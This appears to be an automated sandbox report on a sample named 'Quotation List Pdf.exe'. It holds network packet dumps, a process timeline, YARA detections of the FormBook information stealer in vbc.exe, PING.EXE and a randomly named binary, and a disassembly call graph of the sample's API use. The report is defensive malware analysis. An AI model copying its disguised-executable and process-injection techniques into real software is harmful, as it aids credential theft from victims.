                                                    Jul 1, 2024 15:47:25.634210110 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Jul 1, 2024 15:47:25.634257078 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Jul 1, 2024 15:47:25.634268999 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Jul 1, 2024 15:47:25.634380102 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Jul 1, 2024 15:47:25.634391069 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:44:21
                                                    Start date:01/07/2024
                                                    Path:C:\Users\user\Desktop\Quotation List Pdf.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\Quotation List Pdf.exe"
                                                    Imagebase:0x7ff768430000
                                                    File size:2'404'352 bytes
                                                    MD5 hash:9CFD62FC26438EEB8A50922265AD0EA7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:09:44:21
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:44:22
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\System32\svchost.exe"
                                                    Imagebase:
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:09:44:22
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\regedit.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\regedit.exe"
                                                    Imagebase:
                                                    File size:370'176 bytes
                                                    MD5 hash:999A30979F6195BF562068639FFC4426
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:5
                                                    Start time:09:44:23
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                    Imagebase:0x4a0000
                                                    File size:2'625'616 bytes
                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:09:44:25
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe"
                                                    Imagebase:0xf0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:09:44:26
                                                    Start date:01/07/2024
                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\PING.EXE"
                                                    Imagebase:0xc10000
                                                    File size:18'944 bytes
                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:9
                                                    Start time:09:44:39
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe"
                                                    Imagebase:0xf0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:11
                                                    Start time:09:44:51
                                                    Start date:01/07/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:5.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:25.2%
                                                      Total number of Nodes:937
                                                      Total number of Limit Nodes:31
                                                      execution_graph 15559 7ff76844ee2a 15560 7ff76844ee39 15559->15560 15562 7ff76844ee97 15560->15562 15563 7ff768467c50 15560->15563 15564 7ff768467d90 15563->15564 15572 7ff768467c90 15563->15572 15578 7ff76849b490 15564->15578 15567 7ff768467cfe EnterCriticalSection 15567->15572 15568 7ff768467d3f LeaveCriticalSection 15575 7ff768442e10 15568->15575 15569 7ff768467e3b LeaveCriticalSection 15569->15564 15569->15572 15571 7ff768467e1a EnterCriticalSection 15571->15569 15572->15564 15572->15567 15572->15568 15572->15569 15572->15571 15574 7ff768467e7e EnterCriticalSection LeaveCriticalSection 15572->15574 15587 7ff768442ea0 VirtualFree 15572->15587 15574->15572 15576 7ff768442e4e GetCurrentProcess VirtualAllocExNuma 15575->15576 15577 7ff768442e2b VirtualAlloc 15575->15577 15576->15572 15577->15572 15579 7ff76849b499 15578->15579 15580 7ff768467dfd 15579->15580 15581 7ff76849b740 IsProcessorFeaturePresent 15579->15581 15580->15562 15582 7ff76849b758 15581->15582 15588 7ff76849b938 RtlCaptureContext 15582->15588 15587->15572 15589 7ff76849b952 RtlLookupFunctionEntry 15588->15589 15590 7ff76849b76b 15589->15590 15591 7ff76849b968 RtlVirtualUnwind 15589->15591 15592 7ff76849b70c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15590->15592 15591->15589 15591->15590 15593 7ff768438130 15623 7ff76843d0f0 FlsAlloc 15593->15623 15595 7ff7684382c6 15596 7ff76843813f 15596->15595 15636 7ff76843ce80 GetModuleHandleExW 15596->15636 15598 7ff768438168 15637 7ff768435710 15598->15637 15600 7ff768438170 15600->15595 15645 7ff76843e010 15600->15645 15604 7ff7684381a6 15604->15595 15605 7ff7684381c9 RtlAddVectoredExceptionHandler 15604->15605 15606 7ff7684381dc 15605->15606 15607 7ff7684381e2 15605->15607 15609 7ff768438217 15606->15609 15610 7ff76843e360 8 API calls 15606->15610 15671 7ff76843e360 15607->15671 15611 7ff76843826e 15609->15611 15654 7ff76843eb00 15609->15654 15610->15609 15662 7ff7684321f0 15611->15662 15614 7ff768438273 15614->15595 15674 7ff768442080 15614->15674 15617 7ff7684382b8 15683 7ff768441430 15617->15683 15618 7ff76843829f 15680 7ff76843d250 15618->15680 15621 7ff7684382ab RaiseFailFastException 15621->15617 15624 7ff76843d23e 15623->15624 15625 7ff76843d110 15623->15625 15624->15596 15687 7ff768443ef0 15625->15687 15630 7ff76843e360 8 API calls 15631 7ff76843d142 15630->15631 15632 7ff76843d16d GetCurrentProcess GetProcessAffinityMask 15631->15632 15634 7ff76843d164 15631->15634 15635 7ff76843d1d8 15631->15635 15632->15634 15633 7ff76843d1b4 QueryInformationJobObject 15633->15635 15634->15633 15635->15596 15636->15598 15873 7ff76849b4b0 15637->15873 15640 7ff768435764 15640->15600 15642 7ff768435732 15642->15640 15879 7ff7684410d0 15642->15879 15646 7ff7684410d0 InitializeCriticalSectionEx 15645->15646 15647 7ff768438196 15646->15647 15647->15595 15648 7ff768433b00 15647->15648 15649 7ff76849b4b0 _swprintf_c_l 3 API calls 15648->15649 15650 7ff768433b1e 15649->15650 15651 7ff768433bba 15650->15651 15903 7ff768437ae0 15650->15903 15651->15604 15653 7ff768433b50 15653->15604 15655 7ff76843eb2b 15654->15655 15661 7ff76843ebd6 15654->15661 15656 7ff76849b4b0 _swprintf_c_l 3 API calls 15655->15656 15657 7ff76843eb4a 15656->15657 15658 7ff7684410d0 InitializeCriticalSectionEx 15657->15658 15659 7ff76843eb75 15658->15659 15660 7ff76843ebbe GetSystemTimeAsFileTime 15659->15660 15660->15661 15661->15611 15663 7ff76843223c 15662->15663 15666 7ff768432236 15662->15666 15664 7ff76843e360 8 API calls 15663->15664 15664->15666 15665 7ff7684322b3 15665->15614 15666->15665 15908 7ff768434520 15666->15908 15668 7ff768432298 15668->15665 15915 7ff76843fb30 15668->15915 15669 7ff7684322a8 15669->15614 15945 7ff76843e570 15671->15945 15673 7ff76843e388 15673->15606 15675 7ff7684420c9 15674->15675 15679 7ff76843828b 15674->15679 15676 7ff76844211f GetEnabledXStateFeatures 15675->15676 15675->15679 15677 7ff768442130 15676->15677 15676->15679 15678 7ff768442176 GetEnabledXStateFeatures 15677->15678 15677->15679 15678->15679 15679->15617 15679->15618 15681 7ff76843d264 15680->15681 15681->15681 15682 7ff76843d26d GetStdHandle WriteFile 15681->15682 15682->15621 15684 7ff76844144a _swprintf_c_l 15683->15684 15949 7ff76843ce80 GetModuleHandleExW 15684->15949 15686 7ff7684382bd 15835 7ff76843db00 15687->15835 15689 7ff768443f0e 15690 7ff76843db00 8 API calls 15689->15690 15691 7ff768443f3b 15690->15691 15692 7ff76843db00 8 API calls 15691->15692 15693 7ff768443f63 15692->15693 15694 7ff76843db00 8 API calls 15693->15694 15695 7ff768443f8b 15694->15695 15696 7ff76843db00 8 API calls 15695->15696 15697 7ff768443fb8 15696->15697 15698 7ff76843db00 8 API calls 15697->15698 15699 7ff768443fe0 15698->15699 15700 7ff76843db00 8 API calls 15699->15700 15701 7ff76844400d 15700->15701 15702 7ff76843db00 8 API calls 15701->15702 15703 7ff768444035 15702->15703 15704 7ff76843db00 8 API calls 15703->15704 15705 7ff76844405d 15704->15705 15706 7ff76843db00 8 API calls 15705->15706 15707 7ff768444085 15706->15707 15708 7ff76843db00 8 API calls 15707->15708 15709 7ff7684440b2 15708->15709 15710 7ff76843db00 8 API calls 15709->15710 15711 7ff7684440df 15710->15711 15840 7ff76843dbd0 15711->15840 15714 7ff76843dbd0 18 API calls 15715 7ff768444130 15714->15715 15716 7ff76843dbd0 18 API calls 15715->15716 15717 7ff76844415e 15716->15717 15718 7ff76843dbd0 18 API calls 15717->15718 15719 7ff768444187 15718->15719 15720 7ff76843dbd0 18 API calls 15719->15720 15721 7ff7684441b0 15720->15721 15722 7ff76843dbd0 18 API calls 15721->15722 15723 7ff7684441de 15722->15723 15724 7ff76843dbd0 18 API calls 15723->15724 15725 7ff76844420c 15724->15725 15726 7ff76843dbd0 18 API calls 15725->15726 15727 7ff768444235 15726->15727 15728 7ff76843dbd0 18 API calls 15727->15728 15729 7ff76844425e 15728->15729 15730 7ff76843dbd0 18 API calls 15729->15730 15731 7ff768444287 15730->15731 15732 7ff76843dbd0 18 API calls 15731->15732 15733 7ff7684442b0 15732->15733 15734 7ff76843dbd0 18 API calls 15733->15734 15735 7ff7684442d9 15734->15735 15736 7ff76843dbd0 18 API calls 15735->15736 15737 7ff768444302 15736->15737 15738 7ff76843dbd0 18 API calls 15737->15738 15739 7ff768444330 15738->15739 15740 7ff76843dbd0 18 API calls 15739->15740 15741 7ff76844435e 15740->15741 15742 7ff76843dbd0 18 API calls 15741->15742 15743 7ff768444387 15742->15743 15744 7ff76843dbd0 18 API calls 15743->15744 15745 7ff7684443b0 15744->15745 15746 7ff76843dbd0 18 API calls 15745->15746 15747 7ff7684443d9 15746->15747 15748 7ff76843dbd0 18 API calls 15747->15748 15749 7ff768444402 15748->15749 15750 7ff76843dbd0 18 API calls 15749->15750 15751 7ff768444430 15750->15751 15752 7ff76843dbd0 18 API calls 15751->15752 15753 7ff76844445e 15752->15753 15754 7ff76843dbd0 18 API calls 15753->15754 15755 7ff768444487 15754->15755 15756 7ff76843dbd0 18 API calls 15755->15756 15757 7ff7684444b0 15756->15757 15758 7ff76843dbd0 18 API calls 15757->15758 15759 7ff7684444d9 15758->15759 15760 7ff76843dbd0 18 API calls 15759->15760 15761 7ff768444502 15760->15761 15762 7ff76843dbd0 18 API calls 15761->15762 15763 7ff76844452b 15762->15763 15764 7ff76843dbd0 18 API calls 15763->15764 15765 7ff768444554 15764->15765 15766 7ff76843dbd0 18 API calls 15765->15766 15767 7ff76844457d 15766->15767 15768 7ff76843dbd0 18 API calls 15767->15768 15769 7ff7684445a6 15768->15769 15770 7ff76843dbd0 18 API calls 15769->15770 15771 7ff7684445cf 15770->15771 15772 7ff76843dbd0 18 API calls 15771->15772 15773 7ff7684445f8 15772->15773 15774 7ff76843dbd0 18 API calls 15773->15774 15775 7ff768444621 15774->15775 15776 7ff76843dbd0 18 API calls 15775->15776 15777 7ff76844464a 15776->15777 15778 7ff76843dbd0 18 API calls 15777->15778 15779 7ff768444673 15778->15779 15780 7ff76843dbd0 18 API calls 15779->15780 15781 7ff76844469c 15780->15781 15782 7ff76843dbd0 18 API calls 15781->15782 15783 7ff7684446c5 15782->15783 15784 7ff76843dbd0 18 API calls 15783->15784 15785 7ff7684446ee 15784->15785 15786 7ff76843dbd0 18 API calls 15785->15786 15787 7ff768444717 15786->15787 15788 7ff76843dbd0 18 API calls 15787->15788 15789 7ff768444740 15788->15789 15790 7ff76843dbd0 18 API calls 15789->15790 15791 7ff768444769 15790->15791 15792 7ff76843dbd0 18 API calls 15791->15792 15793 7ff768444792 15792->15793 15794 7ff76843dbd0 18 API calls 15793->15794 15795 7ff7684447bb 15794->15795 15796 7ff76843dbd0 18 API calls 15795->15796 15797 7ff7684447e4 15796->15797 15798 7ff76843dbd0 18 API calls 15797->15798 15799 7ff76844480d 15798->15799 15800 7ff76843dbd0 18 API calls 15799->15800 15801 7ff76844483b 15800->15801 15802 7ff76843dbd0 18 API calls 15801->15802 15803 7ff768444869 15802->15803 15804 7ff76843dbd0 18 API calls 15803->15804 15805 7ff768444897 15804->15805 15806 7ff76843dbd0 18 API calls 15805->15806 15807 7ff7684448c5 15806->15807 15808 7ff76843dbd0 18 API calls 15807->15808 15809 7ff7684448f3 15808->15809 15810 7ff76843dbd0 18 API calls 15809->15810 15811 7ff768444921 15810->15811 15812 7ff76843dbd0 18 API calls 15811->15812 15813 7ff76844494a 15812->15813 15814 7ff76843dbd0 18 API calls 15813->15814 15815 7ff768444978 15814->15815 15816 7ff76843dbd0 18 API calls 15815->15816 15817 7ff7684449a1 15816->15817 15818 7ff76843dbd0 18 API calls 15817->15818 15819 7ff7684449ca 15818->15819 15820 7ff76843dbd0 18 API calls 15819->15820 15821 7ff7684449f8 15820->15821 15822 7ff76843dbd0 18 API calls 15821->15822 15823 7ff76843d115 15822->15823 15824 7ff768442b90 GetSystemInfo 15823->15824 15825 7ff768442bd4 15824->15825 15826 7ff768442bd8 GetNumaHighestNodeNumber 15825->15826 15827 7ff768442bfe GetCurrentProcess GetProcessGroupAffinity 15825->15827 15826->15827 15828 7ff768442be7 15826->15828 15829 7ff768442c29 GetLastError 15827->15829 15830 7ff768442c34 15827->15830 15828->15827 15829->15830 15831 7ff768442c56 15830->15831 15867 7ff768442970 GetLogicalProcessorInformationEx 15830->15867 15833 7ff768442cc0 GetCurrentProcess GetProcessAffinityMask 15831->15833 15834 7ff76843d11a 15831->15834 15833->15834 15834->15624 15834->15630 15836 7ff76843db24 15835->15836 15837 7ff76843db28 15836->15837 15838 7ff76843e360 8 API calls 15836->15838 15837->15689 15839 7ff76843db54 15838->15839 15839->15689 15841 7ff76843dbfa 15840->15841 15842 7ff76843dd0f 15840->15842 15843 7ff76843dc07 strcmp 15841->15843 15844 7ff76843dc1f 15841->15844 15845 7ff76843e360 8 API calls 15842->15845 15843->15844 15851 7ff76843dc17 15843->15851 15847 7ff76843dc2c strcmp 15844->15847 15848 7ff76843dc3f 15844->15848 15846 7ff76843dd26 15845->15846 15846->15851 15862 7ff76843e4e0 15846->15862 15847->15848 15847->15851 15849 7ff76843dc4c strcmp 15848->15849 15850 7ff76843dc5f 15848->15850 15849->15850 15849->15851 15852 7ff76843dc6c strcmp 15850->15852 15853 7ff76843dc7f 15850->15853 15851->15714 15852->15851 15852->15853 15855 7ff76843dc8c strcmp 15853->15855 15856 7ff76843dca3 15853->15856 15855->15851 15855->15856 15857 7ff76843dcc7 15856->15857 15858 7ff76843dcb0 strcmp 15856->15858 15859 7ff76843dceb 15857->15859 15860 7ff76843dcd4 strcmp 15857->15860 15858->15851 15858->15857 15859->15842 15861 7ff76843dcf8 strcmp 15859->15861 15860->15851 15860->15859 15861->15842 15861->15851 15863 7ff76843e52e 15862->15863 15864 7ff76843e504 15862->15864 15863->15851 15864->15863 15865 7ff76843e510 _stricmp 15864->15865 15865->15864 15866 7ff76843e545 strtoull 15865->15866 15866->15863 15868 7ff768442b5c 15867->15868 15869 7ff7684429a2 GetLastError 15867->15869 15868->15831 15869->15868 15870 7ff7684429b1 15869->15870 15870->15868 15871 7ff7684429cd GetLogicalProcessorInformationEx 15870->15871 15872 7ff7684429f0 15871->15872 15872->15831 15881 7ff76849bda4 15873->15881 15875 7ff768435725 15875->15640 15876 7ff7684410f0 15875->15876 15877 7ff7684410d0 InitializeCriticalSectionEx 15876->15877 15878 7ff76844112e 15877->15878 15878->15642 15880 7ff76849b0d4 InitializeCriticalSectionEx 15879->15880 15882 7ff76849bdbe malloc 15881->15882 15883 7ff76849bdaf 15882->15883 15884 7ff76849bdc8 15882->15884 15883->15882 15885 7ff76849bdce 15883->15885 15884->15875 15886 7ff76849bdd9 15885->15886 15890 7ff76849c204 15885->15890 15894 7ff76849c224 15886->15894 15891 7ff76849c212 std::bad_alloc::bad_alloc 15890->15891 15898 7ff76849cf30 15891->15898 15893 7ff76849c223 15895 7ff76849c232 std::bad_alloc::bad_alloc 15894->15895 15896 7ff76849cf30 Concurrency::cancel_current_task 2 API calls 15895->15896 15897 7ff76849bddf 15896->15897 15897->15875 15901 7ff76849cf4f 15898->15901 15899 7ff76849cf78 RtlPcToFileHeader 15902 7ff76849cf90 15899->15902 15900 7ff76849cf9a RaiseException 15900->15893 15901->15899 15901->15900 15902->15900 15904 7ff76849b4b0 _swprintf_c_l 3 API calls 15903->15904 15905 7ff768437afe 15904->15905 15906 7ff7684410d0 InitializeCriticalSectionEx 15905->15906 15907 7ff768437b30 15905->15907 15906->15907 15907->15653 15909 7ff768434532 15908->15909 15910 7ff76843456d 15909->15910 15922 7ff768440f60 CreateEventW 15909->15922 15910->15668 15912 7ff768434544 15912->15910 15923 7ff76843d350 CreateThread 15912->15923 15914 7ff768434563 15914->15668 15916 7ff76843fb47 15915->15916 15917 7ff76843fb4f 15916->15917 15918 7ff76849b4b0 _swprintf_c_l 3 API calls 15916->15918 15917->15669 15919 7ff76843fb81 15918->15919 15921 7ff76843fc15 15919->15921 15926 7ff7684457e0 15919->15926 15921->15669 15922->15912 15924 7ff76843d37f 15923->15924 15925 7ff76843d385 SetThreadPriority ResumeThread FindCloseChangeNotification 15923->15925 15924->15914 15925->15914 15927 7ff768445813 _swprintf_c_l 15926->15927 15931 7ff768445839 _swprintf_c_l 15927->15931 15932 7ff768446920 15927->15932 15929 7ff768445830 15930 7ff7684410d0 InitializeCriticalSectionEx 15929->15930 15929->15931 15930->15931 15931->15919 15931->15931 15941 7ff768442ee0 15932->15941 15934 7ff768446942 15935 7ff76844694a 15934->15935 15936 7ff768442e10 3 API calls 15934->15936 15935->15929 15937 7ff768446968 15936->15937 15940 7ff768446973 _swprintf_c_l 15937->15940 15944 7ff768442ec0 VirtualFree 15937->15944 15939 7ff768446a8e 15939->15929 15940->15929 15942 7ff768442f05 VirtualAlloc 15941->15942 15943 7ff768442f24 GetCurrentProcess VirtualAllocExNuma 15941->15943 15942->15943 15943->15934 15944->15939 15948 7ff76843e5a6 15945->15948 15946 7ff76849b490 8 API calls 15947 7ff76843e64a 15946->15947 15947->15673 15948->15946 15949->15686 15950 7ff768431f2f 15951 7ff7684fdfd0 15950->15951 15952 7ff7684fe1a1 15951->15952 15953 7ff7684fe1bc 15951->15953 15957 7ff7684fdfe3 15951->15957 15954 7ff7684fe1ba 15952->15954 15969 7ff768577170 15952->15969 15980 7ff7684347c0 15953->15980 15987 7ff7684f3cf0 15954->15987 15959 7ff7684fe1ec 15960 7ff7684fe21f 15959->15960 15961 7ff7684fe1f7 15959->15961 15962 7ff7684347c0 26 API calls 15960->15962 15963 7ff7684fe21d 15961->15963 15965 7ff768577170 26 API calls 15961->15965 15962->15963 15993 7ff7684fe270 15963->15993 15965->15963 15966 7ff7684fe246 15997 7ff7684f3d20 15966->15997 15968 7ff7684fe257 15970 7ff76857718b 15969->15970 15971 7ff76857720a 15969->15971 15972 7ff7685771ea 15970->15972 15973 7ff768577193 15970->15973 16002 7ff7684bda90 15971->16002 15975 7ff7684347c0 26 API calls 15972->15975 15978 7ff7684347c0 26 API calls 15973->15978 15979 7ff7685771a3 15973->15979 15977 7ff7685771f5 15975->15977 15976 7ff768577219 15976->15954 15977->15954 15978->15979 15979->15954 15981 7ff7684347c9 15980->15981 15982 7ff76843480e 15981->15982 15983 7ff768434c10 26 API calls 15981->15983 15982->15954 15984 7ff7684f2310 15983->15984 15985 7ff7684f24a0 26 API calls 15984->15985 15986 7ff7684f23d3 15985->15986 15988 7ff7684f3cfc 15987->15988 15989 7ff7684f3d18 15987->15989 15988->15959 15991 7ff7684f3d40 15989->15991 16150 7ff7684f3e30 15989->16150 15991->15959 15994 7ff7684fe294 15993->15994 15996 7ff7684fe2ce 15994->15996 16170 7ff768525550 15994->16170 15996->15966 15998 7ff7684f3d2c 15997->15998 15999 7ff7684f3e30 26 API calls 15998->15999 16000 7ff7684f3d40 15998->16000 16001 7ff7684f3e0f 15999->16001 16000->15968 16001->15968 16003 7ff7684bda99 16002->16003 16008 7ff768434c10 16003->16008 16009 7ff768434ccb 16008->16009 16014 7ff7684f23e0 16009->16014 16015 7ff7684f23f2 16014->16015 16018 7ff7684f24a0 16015->16018 16031 7ff7684376e0 16018->16031 16020 7ff7684f251f 16025 7ff7684f25d7 16020->16025 16051 7ff768437820 16020->16051 16021 7ff7684f260c 16063 7ff768434350 16021->16063 16025->16021 16059 7ff7684f2060 16025->16059 16032 7ff76843772b 16031->16032 16033 7ff768437770 16032->16033 16034 7ff768437730 16032->16034 16036 7ff76843778a 16033->16036 16038 7ff76843ec00 4 API calls 16033->16038 16035 7ff76843774a 16034->16035 16066 